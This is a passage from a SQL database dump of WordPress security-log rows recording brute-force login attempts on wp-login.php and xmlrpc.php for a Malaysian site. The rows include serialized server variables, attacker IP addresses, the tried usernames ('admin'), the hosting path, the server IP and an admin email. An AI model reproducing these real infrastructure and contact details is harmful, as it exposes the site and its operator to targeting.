06:44:12',18256152,19555976,'https://bintara.com.my/xmlrpc.php',1,0,'103.22.250.194'),(24436,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"38754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCA3tVIJ66zPtjtaf0ivAAAAUg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702686.8845\";s:12:\"REQUEST_TIME\";s:10:\"1568702686\";}}','notice','2019-09-17 06:44:48','2019-09-17 06:44:47',17741104,19229656,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(24437,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"39230\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCA4dVIJ66zPtjtaf0iwAAAAUA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702690.0802\";s:12:\"REQUEST_TIME\";s:10:\"1568702690\";}}','notice','2019-09-17 06:44:51','2019-09-17 06:44:50',18257720,19557200,'https://bintara.com.my/xmlrpc.php',1,0,'209.15.37.34'),(24438,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"51.254.175.184\";s:11:\"REMOTE_PORT\";s:5:\"50325\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCChNVIJ66zPtjtaf0kWAAAAVQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568703108.4967\";s:12:\"REQUEST_TIME\";s:10:\"1568703108\";}}','notice','2019-09-17 06:51:50','2019-09-17 06:51:48',17737736,19228480,'https://bintara.com.my/wp-login.php',1,0,'51.254.175.184'),(24439,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"51.254.175.184\";s:11:\"REMOTE_PORT\";s:5:\"50725\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCCh9VIJ66zPtjtaf0kXQAAAUs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568703111.7351\";s:12:\"REQUEST_TIME\";s:10:\"1568703111\";}}','notice','2019-09-17 06:51:53','2019-09-17 06:51:52',18255056,19553528,'https://bintara.com.my/xmlrpc.php',1,0,'51.254.175.184'),(24440,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"50750\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCEdNK-omY048@iBsM31gAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568703604.2842\";s:12:\"REQUEST_TIME\";s:10:\"1568703604\";}}','notice','2019-09-17 07:00:06','2019-09-17 07:00:04',17742208,19233256,'https://bintara.com.my/wp-login.php',1,0,'52.64.168.0'),(24441,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"51424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCEd9VIJ66zPtjtaf0nvwAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568703607.6124\";s:12:\"REQUEST_TIME\";s:10:\"1568703607\";}}','notice','2019-09-17 07:00:08','2019-09-17 07:00:07',18255168,19555056,'https://bintara.com.my/xmlrpc.php',1,0,'52.64.168.0'),(24442,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.151.218.99\";s:11:\"REMOTE_PORT\";s:5:\"56334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCGVNK-omY048@iBsM5oAAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704085.0806\";s:12:\"REQUEST_TIME\";s:10:\"1568704085\";}}','notice','2019-09-17 07:08:06','2019-09-17 07:08:05',17742568,19232936,'https://bintara.com.my/wp-login.php',1,0,'192.151.218.99'),(24443,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.151.218.99\";s:11:\"REMOTE_PORT\";s:5:\"57974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCGVx@uZ4OC5N1Fn8FTkAAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704088.0054\";s:12:\"REQUEST_TIME\";s:10:\"1568704088\";}}','notice','2019-09-17 07:08:09','2019-09-17 07:08:08',18255944,19555288,'https://bintara.com.my/xmlrpc.php',1,0,'192.151.218.99'),(24444,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"50584\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCG-w99C9j9bhK9KplOVwAAARY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704255.5676\";s:12:\"REQUEST_TIME\";s:10:\"1568704255\";}}','notice','2019-09-17 07:10:56','2019-09-17 